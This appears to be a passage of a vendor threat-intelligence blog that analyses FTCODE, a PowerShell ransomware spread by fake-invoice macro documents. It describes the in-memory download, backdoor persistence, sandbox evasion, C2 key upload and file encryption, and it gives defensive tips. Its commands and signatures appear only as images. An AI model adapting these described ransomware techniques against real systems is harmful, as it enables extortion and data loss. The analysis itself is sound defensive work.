&lt;p&gt;Indeed, last year we saw the arrival of a new downloader and backdoor written in Powershell that was called sLoad and it’s still being actively distributed &lt;a href=&quot;https://www.certego.net/blog/sloadhits/&quot;&gt;Certego sLoad analysis&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;KISS (“keep it simple and stupid”) they teach you during software engineering courses. So, why strive with sophisticated malware when with a bunch of code written in Powershell you can perform every kind of wickedness?&lt;/p&gt;
&lt;p&gt;So let’s dive in more technical details to understand how &lt;strong&gt;FTCODE&lt;/strong&gt; works.&lt;/p&gt;
&lt;p&gt;Mainly we analyzed two samples from two different campaigns:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;version 930.5, md5: a5af9f4b875be92a79085bb03c46fe5c, day: 01/10/2019&lt;/li&gt;
&lt;li&gt;version 1001.7, md5: 8d4c81e06b54436160886d78a1fb5c38, day 02/10/2019&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;&lt;strong&gt;2.Payload Delivery&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;As stated before, the user receives an email that refers to a fake invoice with an attached document called &quot;Fattura-2019-951692.doc&quot;. The threat actor leverages a commonly used template to trick the user to disable the &lt;a href=&quot;https://en.wikipedia.org/wiki/Microsoft_Office_2010#Protected_View/&quot;&gt;“Protected View”&lt;/a&gt; mode and to trigger the execution of the malicious macro.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 615px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/38efecab6c4de07273d3267069dc0350/f6b72/ftcode1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 38.020833333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAAsTAAALEwEAmpwYAAABlklEQVR42jWQ227aQBCGbRMwgVgB4gaVQqNGcZKbSG3SotLn6Ku14BP2OpjEVJhym6fadfBpd407QCr9Gq12/m9OgjTOBb0UjVLUS8kohXF57vHhKj/3MhXlLSfvPmaivoWs+N8GqpmFYGyFAyxMdhIh/ioHM/bzJb2YJ7eLRAvi6yCBigfD4QGwbPIdLP6mssUH880HP+77cddLVC/poFh1k7abdlCqohT+e7OkN4sH/qbvb6pm8dYZYEkvmzaTLVYzec+PR2vyLcTDkIz+koclGa7IqUMhdWyxusVkk0mTbc3Yw9VJ1pyyY5srDm3YrGHTNqKnLlOmtO3SFoKYKQ5THA62E4crLj9DtGGxHVzT06/QYYXvQzxa4y/L6PIp0gJyMX/VgugmwJ+eyM2CXAXRdYC1RXS7wO8fkze4MobDsq6Xv0O0P8s+L8nVc/RxHt2H0Y81vvvz+hCS72usPW9OpjmMA4KxZWN/sKoOOxfSpIBY0TmUhA2bNm1N2ZlL2w7tuFRFVLFZRS+OjOJIL+omr++v/Q9BkAtJL43kcQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ftcode1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/38efecab6c4de07273d3267069dc0350/f6b72/ftcode1.png&quot;
        srcset=&quot;/website/static/38efecab6c4de07273d3267069dc0350/804b2/ftcode1.png 384w,
/website/static/38efecab6c4de07273d3267069dc0350/f6b72/ftcode1.png 615w&quot;
        sizes=&quot;(max-width: 615px) 100vw, 615px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Once enabled, the macro runs and spawns the following Powershell process:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 711px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/b2a4ea64e834907771f76ab88297a01b/a8e5b/ftcode2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 11.458333333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAUElEQVR42i2LyRHAIAwD6b9LC+KLT8xQQESSfWjWHqllBABVzZxmBnRiakz6GBeBgOLuETFP7Wjd1Xh8jfNxp/cXgfQ+ODsIMnPV+qmi7r0ftnFsi4LN2FkAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ftcode2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/b2a4ea64e834907771f76ab88297a01b/a8e5b/ftcode2.png&quot;
        srcset=&quot;/website/static/b2a4ea64e834907771f76ab88297a01b/804b2/ftcode2.png 384w,
/website/static/b2a4ea64e834907771f76ab88297a01b/a8e5b/ftcode2.png 711w&quot;
        sizes=&quot;(max-width: 711px) 100vw, 711px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The result is the download of a piece of Powershell code that is run using the &quot;Invoke-Expression&quot; command (“&lt;strong&gt;iex&lt;/strong&gt;”). Note that the function “DownloadString” saves the result of the request only in memory, in an attempt to avoid antivirus detection.&lt;/p&gt;
&lt;p&gt;The new Powershell code is &lt;strong&gt;FTCODE&lt;/strong&gt; itself. On execution, it performs the following GET request:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 711px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/9287773d4c6836253791951802cec782/a8e5b/ftcode3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 7.8125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAVElEQVR42i2MUQ7AIAhDvf81DYIWdVvE73VmLw15IdAkIgBUjak/jXCaVS1FGJGcs5lpUfq8ZkSstRI/Rx+Au3fih8/6IHScDSt5iQb23vez946IFxpQbjUZ2nSXAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ftcode3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/9287773d4c6836253791951802cec782/a8e5b/ftcode3.png&quot;
        srcset=&quot;/website/static/9287773d4c6836253791951802cec782/804b2/ftcode3.png 384w,
/website/static/9287773d4c6836253791951802cec782/a8e5b/ftcode3.png 711w&quot;
        sizes=&quot;(max-width: 711px) 100vw, 711px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;to download a Visual Basic Script file and save it in &quot;C:\Users\Public\Libraries\WindowsIndexingService.vbs&quot;.&lt;/p&gt;
&lt;p&gt;This is a variant of &lt;strong&gt;JasperLoader&lt;/strong&gt;, a simple backdoor that is able to download further payloads.&lt;/p&gt;
&lt;p&gt;Then, it tries to create a shortcut file called &quot;WindowsIndexingService.lnk&quot; in the user&apos;s startup folder that runs the JasperLoader. Finally, to achieve persistence after reboot, it creates a scheduled task called &quot;WindowsApplicationService&quot; pointing to the shortcut file.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;3.Environment Preparation&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;After having installed the JasperLoader backdoor, &lt;strong&gt;FTCODE&lt;/strong&gt; starts to prepare the environment for the ransomware attack.&lt;/p&gt;
&lt;p&gt;It verifies if the file &quot;C:\Users\Public\OracleKit\w00log03.tmp&quot; exists. If yes, it would check the presence of some files with the extension &quot;.FTCODE&quot; in all the drives with at least a free space of 50 KB. If there are some, it means that the machine was already attacked by the ransomware, maybe by a previous version: therefore, it would exit.&lt;/p&gt;
&lt;p&gt;De facto, this indicator can be used to “&lt;strong&gt;vaccinate&lt;/strong&gt;” the endpoints from this threat. It’s enough to create the mentioned file with any kind of content to let FTCODE believe that the computer was already infected.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 707px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/8216fc305c97648826ae08351ea4c35f/394f7/ftcode4.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 38.541666666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAu0lEQVR42o2R2w6DIAyGff9X3OLkUAiggBx0l/tFs2SJxn0X0DT9SoFOShrHaZpGYywRIQohWOu01iHEWutyBvLrunacC2pwzgfGhBDDwNARK2dcElnnUkr1l1IKWnSMMfjg8Xj2/UsphQRkrbQxBlrOGaXnMqqFkJAxdvDeB4/q9wbmWusFh4xp53neei8LqqEgWxr1mkMWuLMkay1eyDmHAIfvT3IvpwYOjzHuEcaudxxybtv3A/5klz/MucNAxMlOWAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ftcode4&quot;
        title=&quot;&quot;
        src=&quot;/website/static/8216fc305c97648826ae08351ea4c35f/394f7/ftcode4.png&quot;
        srcset=&quot;/website/static/8216fc305c97648826ae08351ea4c35f/804b2/ftcode4.png 384w,
/website/static/8216fc305c97648826ae08351ea4c35f/394f7/ftcode4.png 707w&quot;
        sizes=&quot;(max-width: 707px) 100vw, 707px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Afterwards it generates a random globally unique identifier (GUID) and a password consisting of 50 characters with at least 4 non-alphanumeric characters.&lt;/p&gt;
&lt;p&gt;Then we found a hardcoded RSA public key that is used to encrypt the password. In this way the password cannot be deciphered without the proper private key controlled by the malicious actor and can be sent, in a secure way, to the attacker’s server.&lt;/p&gt;
&lt;p&gt;Surprisingly, the encrypted password, after being generated, is never used elsewhere in the code and, instead, is just sent the basic base64-encoded password to the attacker’s server.&lt;/p&gt;
&lt;p&gt;The consequence is that, &lt;strong&gt;if the traffic against the attacker’s server is being monitored, it’s possible to retrieve the key that will be used to decipher the files, without paying any ransom&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;We believe that this mistake will be corrected in future versions.&lt;/p&gt;
&lt;p&gt;After that error, FTCODE performs a POST request to the following URL:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 707px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/9c363f275d52c31158ad7d88922e9946/394f7/ftcode5.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 8.072916666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAARUlEQVR42o2NuQ0AMAgDs/+kPIYOWgcyQYoT1gnZR0Xp7owIighNjWY+2PMA5oJV9cXZ58xkTuEWbAaCGI/AG4px3f3FBQoSmJqP/fAqAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ftcode5&quot;
        title=&quot;&quot;
        src=&quot;/website/static/9c363f275d52c31158ad7d88922e9946/394f7/ftcode5.png&quot;
        srcset=&quot;/website/static/9c363f275d52c31158ad7d88922e9946/804b2/ftcode5.png 384w,
/website/static/9c363f275d52c31158ad7d88922e9946/394f7/ftcode5.png 707w&quot;
        sizes=&quot;(max-width: 707px) 100vw, 707px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ver=930.5, version number&lt;/li&gt;
&lt;li&gt;vid=dpec2, probably to identify the campaign&lt;/li&gt;
&lt;li&gt;psver=Powershell Major Version, probably to understand if FTCODE needs an update from JasperLoader&lt;/li&gt;
&lt;li&gt;guid=the GUID generated previously, to identify the victim&lt;/li&gt;
&lt;li&gt;ek=the previously generated password encoded in base64&lt;/li&gt;
&lt;li&gt;if the server response is &quot;ok&quot;, it creates the file &quot;C:\Users\Public\OracleKit\w00log03.tmp&quot; containing the GUID. If the server response is different, it would exit. This is another protection mechanism to evade execution in simulated environments.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Afterwards, it tries to run the following commands that are commonly used by almost every ransomware to avoid the chance that the victim can recover the encrypted files without paying:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 709px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/55c497bc8e4b6edd64b0eb01708b521c/4d08a/ftcode6.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 24.739583333333332%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAAsTAAALEwEAmpwYAAAApElEQVR42n2PSQrDMAxFc/8DthTqeZacyY6dbeVCId3kLTSAvqQ/IeYQYv5CRQJAgJRSGEQEjDGONo5cSmk/eu+TtYZx7p2zxnLGpVLOOa21s84Y471f15U0+06hHMfxJzZaMy600jRKG4RUQkgp1bZtvTea7hfahSFWUj2eL8EFaejym/F5nskCANRa2y3Tsizeh4wZyD1mMkZ/0tmMWEo9+x0fOS8VwByeIlkAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ftcode6&quot;
        title=&quot;&quot;
        src=&quot;/website/static/55c497bc8e4b6edd64b0eb01708b521c/4d08a/ftcode6.png&quot;
        srcset=&quot;/website/static/55c497bc8e4b6edd64b0eb01708b521c/804b2/ftcode6.png 384w,
/website/static/55c497bc8e4b6edd64b0eb01708b521c/4d08a/ftcode6.png 709w&quot;
        sizes=&quot;(max-width: 709px) 100vw, 709px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Similar behaviour is performed by &lt;a href=&quot;https://www.certego.net/blog/malware-tales-sodinokibi/&quot;&gt;Sodinokibi: Certego blog&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;4.Ransomware Attack&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;At this moment, everything is ready to perform the real attack phase.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;FTCODE&lt;/strong&gt; checks for all the drives with at least 50 KB of free space and it looks for all the files with the following extensions:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1152px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/5fa9192aec18472e8386ba331c976d02/4ad3a/ftcode7.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 76.56250000000001%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAIAAABr+ngCAAAACXBIWXMAABYlAAAWJQFJUiTwAAABm0lEQVR42j2T27aCMAxE+//fpwICLZdCK+ryjq9nt+MhD1nNJJlJQzH3+31Zlhgj/nK5nLPFbCDX6xUPwgFvrcWr8vV6GYK6rkGLosB32dq2rapq8+CHw4EywuPxKOS8nA2UrnPee2ftMAzOuRBCm42GkI0s1X5KRgEhAuu6GsaDrM623+/xfd/Tpn7oCOmkxjpXVSVh0zQwprFp7rNRB6Vy0CPCGYVxHAWShQLPGfzxeJh5nnXJ8d+mye92O25HjxBqJOCypTtqbAYALYsCCgaDpW4aFKSv9XCAgkrAtmWERJeaWRhpja1RVU0bDToI17cA4UDqdrsZvhgBkBK6AkRlWXJGiqym4DuxPjZKivD5fBpYKVUDRikIt2Iw6DkIxDMC+j7v76fMTaAhp+cB8ehHDUyY1QbXaVNONbrg+/02vLVNU1LyKtpWIESa3IIU79rwuaQM1He9lqfdaFp9YY2tvSAL+HskoNoqxpwk9M6379TledMjs1ZPEP3P55N+jNPpBBksQDHEeQ4hBkAE2Qj49G8Kse/3u67rHyUWGi2bmqfPAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ftcode7&quot;
        title=&quot;&quot;
        src=&quot;/website/static/5fa9192aec18472e8386ba331c976d02/4ad3a/ftcode7.png&quot;
        srcset=&quot;/website/static/5fa9192aec18472e8386ba331c976d02/804b2/ftcode7.png 384w,
/website/static/5fa9192aec18472e8386ba331c976d02/e5715/ftcode7.png 768w,
/website/static/5fa9192aec18472e8386ba331c976d02/4ad3a/ftcode7.png 1152w&quot;
        sizes=&quot;(max-width: 1152px) 100vw, 1152px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Then, it encrypts the first 40960 bytes of each of them using the “Rijndael symmetric key encryption”. The key is created based on the previous generated key and the hardcoded string “BXCODE hack your system”. The initialization vector is also based on another hardcoded string (&quot;BXCODE INIT&quot;).&lt;/p&gt;
&lt;p&gt;Finally it appends the extension &quot;.FTCODE&quot; and creates the file &quot;READ_ME_NOW.htm&quot; in the folders that contain the encrypted files. We are talking about the classic ransom note with instructions on how to recover the encrypted file.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1277px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/bf14cdd83c2c50a3eac8a121f7b0b6b6/a3a5c/ftcode8.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 37.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA9UlEQVR42o2Q227DIAyGef/n6yq1SZNVC6gqCYcshiYQmE2WqDeT9glh+/eBA7tX1b2uxWcr2rZrbvXH6VsNOYT0emXvc4z5bxh0nbpWw6VWl5u+tv25gk7kXua+z49Hci7lnApot56U9uYvwaXSZoyDjcquUkXwa/4fjHNujBlH3NRozWi1tVrjONwGQhd6chU61mJGAwA1oyalfD4lgAshzPO8LIFYiBL+epstuRDLX7CmaYQQWJTSitJaiOTFIzwo6lGwMt5xQXC8zISnOwcOph0okEbLTTDBVgPgvWdK0Uvw8qa8BCXs2dKOpsAOicj7h/0AI93MB+nFg1EAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ftcode8&quot;
        title=&quot;&quot;
        src=&quot;/website/static/bf14cdd83c2c50a3eac8a121f7b0b6b6/a3a5c/ftcode8.png&quot;
        srcset=&quot;/website/static/bf14cdd83c2c50a3eac8a121f7b0b6b6/804b2/ftcode8.png 384w,
/website/static/bf14cdd83c2c50a3eac8a121f7b0b6b6/e5715/ftcode8.png 768w,
/website/static/bf14cdd83c2c50a3eac8a121f7b0b6b6/a3a5c/ftcode8.png 1277w&quot;
        sizes=&quot;(max-width: 1277px) 100vw, 1277px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;5.Version Changes&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;We believe that this ransomware is in active development. Just one day after the delivery of the version 930.5, we saw another version distributed (1001.7). Malware authors noticed that, in the first version, there was no mechanism to tell the threat actors if the file encryption was successful or not. So, they added other 2 lines of code that trigger other 2 C&amp;#x26;C POST requests with the following new parameters:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;status=”start” or “done”&lt;/li&gt;
&lt;li&gt;res=number of successfully encrypted files&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;&lt;strong&gt;6.Conclusion&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Actors change their tactics faster and faster. But we understood that they could be lazy and they can make mistakes too. They are humans after all.&lt;/p&gt;
&lt;p&gt;Some of them are starting to prefer ransomware like FTCODE over classic infostealers and bankers.&lt;/p&gt;
&lt;p&gt;Also, we found that, monitoring the network traffic, it’s possible to retrieve they key used to encrypt the files.&lt;/p&gt;
&lt;p&gt;So, it’s important to continuously monitor your own assets, both on a network and an endpoint level, to fight against these kind of threats.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Certego Threat Intelligence Team&lt;/strong&gt; has been studying upcoming cyber threats for years in order to provide the best protection to their customers.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;7.Suricata IDS Signatures&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1154px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/b6b6e47dd404d203e64b4b2a30344360/0940f/ftcode9.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 59.63541666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAABYlAAAWJQFJUiTwAAABeUlEQVR42mXSyXLCQAwEUP//nyUXNoM3iAGzBLxQFAXhmOeZ3KLDlJaW1Go7ud/vt9ut7/thGC6Xy+l0ul6vXdcJH4+H93A4tG3bdx1Y27Uy36Odn89ncjwep9NpWZar1SpdpvP5fLlc5nnu3e/3TdNMJpP1el1VlXez2SgBZ1lmQQKhYLzaV7A8y3a7HbA8LqDb7RZAg2bLtsHQSTCQKorCFOX6q1YQboLp1xwX/mXKcjabpWnquuR8PscsR5sRRtZ1jUhcImMtLtZQxJTFYiFDrAQxCAV6eIVd0IZaVBRK9sFGXZWGwXRrARIzTEKPQrSJ4rF4JIZFUboiKmItCqpaxs2k50UlCJoHa5q9BiANzsFWqM3rImD+KBgCUT04IAVOvFmzDEcYVXRFFEjzKJgBvjBVIKA5CiOLqjIl7sfFFWD8OFcG5VGweHOAlp+fH0I9MnA2R6mp6IeBOQazg36JuxGwX9l5sTz+iW3rfb/fP8Fer9fPP/sFIft7gmmMALYAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ftcode9&quot;
        title=&quot;&quot;
        src=&quot;/website/static/b6b6e47dd404d203e64b4b2a30344360/0940f/ftcode9.png&quot;
        srcset=&quot;/website/static/b6b6e47dd404d203e64b4b2a30344360/804b2/ftcode9.png 384w,
/website/static/b6b6e47dd404d203e64b4b2a30344360/e5715/ftcode9.png 768w,
/website/static/b6b6e47dd404d203e64b4b2a30344360/0940f/ftcode9.png 1154w&quot;
        sizes=&quot;(max-width: 1154px) 100vw, 1154px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;8.IoC&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1154px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/e84a734ec7a0ae4b59582325ec99a49c/0940f/ftcode10.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 44.27083333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAIAAAC9o5sfAAAACXBIWXMAABYlAAAWJQFJUiTwAAABBUlEQVR42m2RSXaEMAxEuf+xWHEA5nkmDOlmjgObfDDkdV66FnpyuUqWZGWapr7vx3F8Pp/9DZl3Xfd4PIZhmOf56x2Utm1N03QcxzAMy7JIdF2HIdc0TVVV+DiOkVJieQFHpSxL13WDIMDmeV5wAiZNU5iqqrrP4/11XZe/OMxc27ZNbenxfZ+jzKMoyrIM3X/nZeYaNTrP9WT/vEmtuq5pVQ68vMNlxhOGoRyYiE3uibUJIV43JE7IBL+CFDPT0ie7kauiCv1DNk3TnkD2cYIxIYlUP15GytqKosjznIgCKQwibiGRwpMzUZIkRI70pfDPfPJ24/uGTLdtl+SvYN8vRgjxA5o27ZYk6K7KAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ftcode10&quot;
        title=&quot;&quot;
        src=&quot;/website/static/e84a734ec7a0ae4b59582325ec99a49c/0940f/ftcode10.png&quot;
        srcset=&quot;/website/static/e84a734ec7a0ae4b59582325ec99a49c/804b2/ftcode10.png 384w,
/website/static/e84a734ec7a0ae4b59582325ec99a49c/e5715/ftcode10.png 768w,
/website/static/e84a734ec7a0ae4b59582325ec99a49c/0940f/ftcode10.png 1154w&quot;
        sizes=&quot;(max-width: 1154px) 100vw, 1154px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;Author&lt;/strong&gt;&lt;/h1&gt;
